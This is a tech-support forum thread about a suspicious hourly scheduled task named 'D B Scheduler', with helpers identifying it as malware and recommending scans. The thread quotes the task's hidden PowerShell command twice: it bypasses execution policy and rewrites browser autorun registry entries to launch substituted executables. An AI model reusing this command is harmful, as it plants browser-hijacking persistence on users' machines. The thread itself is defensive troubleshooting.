Question D B Scheduler being intrusive

somedude601

Reputable
Mar 2, 2021
The issue: So every single hour, powershell will pop up and immediately close. This is somewhat annoying, but the real issue is that it will forcefully attempt to minimize my current task, and there are a few games that will outright crash or even freeze the computer if you attempt to minimize them. Checking task scheduler, the task that was performed every time is simply "D B scheduler." This only started happening ~1 week ago.
I know what D B scheduler is (for the most part), but I'm unsure why it and nothing else would trigger every hour, as well as causing power shell to open. Is it possible that this is malware disguising itself as D B scheduler?
If not, is there a way to cause it to stop opening power shell at an hourly interval like this, and if all else fails, is it safe to disable the task without completely ruining the system?
Screenshot of task scheduler

somedude601

Reputable
Mar 2, 2021
in task scheduler, select the task and click on the actions tab
whats it show there?
Action: Start a program
Program/Script: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Arguments: -WindowStyle Hidden -ExecutionPolicy bypass -c "$p='HKCU:\Software\Microsoft\Windows\CurrentVersion\Run';$k=Get-Item $p;foreach ($i in $k.Property){if($i -like 'MicrosoftEdgeAutoLaunch'){$v=Get-ItemPropertyValue $p -Name $i;$v=$v.Replace('.exe','1.exe');Set-ItemProperty -Path $p -Name $i -Value $v} elseif($i -like 'GoogleChromeAutoLaunch'){$v1=Get-ItemPropertyValue $p -Name $i;$v1=$v1.Replace('chrome.exe','chrome1.exe');Set-ItemProperty -Path $p -Name $i -Value $v1} }"

Start in: C:\Users\Wood\AppData\Roaming\Browser Assistant\

Colif

Win 11 Master
do you know what DB Scheduler is?

try running malwarebytes or hitman pro and see if they see anything

is it safe to disable the task without completely ruining the system?
you can try to disable it, but if its a virus it probably enables it again.

only other reference to it I can find is a 2 weeks ago, and its the same thing as they mention 10 minutes.

Last edited:
Reactions: Injyah
Action: Start a program
Program/Script: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Arguments: -WindowStyle Hidden -ExecutionPolicy bypass -c "$p='HKCU:\Software\Microsoft\Windows\CurrentVersion\Run';$k=Get-Item $p;foreach ($i in $k.Property){if($i -like 'MicrosoftEdgeAutoLaunch'){$v=Get-ItemPropertyValue $p -Name $i;$v=$v.Replace('.exe','1.exe');Set-ItemProperty -Path $p -Name $i -Value $v} elseif($i -like 'GoogleChromeAutoLaunch'){$v1=Get-ItemPropertyValue $p -Name $i;$v1=$v1.Replace('chrome.exe','chrome1.exe');Set-ItemProperty -Path $p -Name $i -Value $v1} }"
Start in: C:\Users\Wood\AppData\Roaming\Browser Assistant\
Looks like traces of some malware.
Disable the task.

Mar 24, 2022
I ran the malware bites and removed quite a few threats that defender didn't take care of, had to uninstall chrome since there was an issue with something blocking it from updating. When I went to reinstall chrome though it was as if something was preventing it. End case I'm using microsoft edge now due to the conflict of interest and so far everything seems to be copacetic. Also, task manager no longer has the run every 10 minutes d b scheduler command. God I hope this is it, for a gamer trying to game with his kids this has truely been a nightmare. Thank you for having the exact same issue and reaching out and thank you moderators for having a solution.

Last edited:

gardenman

Splendid
Sorry I'm a little late to see this but you're in good hands.

A quick search for "Browser Assistant" brings up:
https://blog.malwarebytes.com/detections/trojan-browserassistant-ps/
It seems you've been directed to try Malwarebytes already and hopefully it helped some.

When I went to reinstall chrome though it was as if something was preventing it.
If the reboot doesn't help... Are you getting an error? If not, what exactly happens when you try to install Chrome?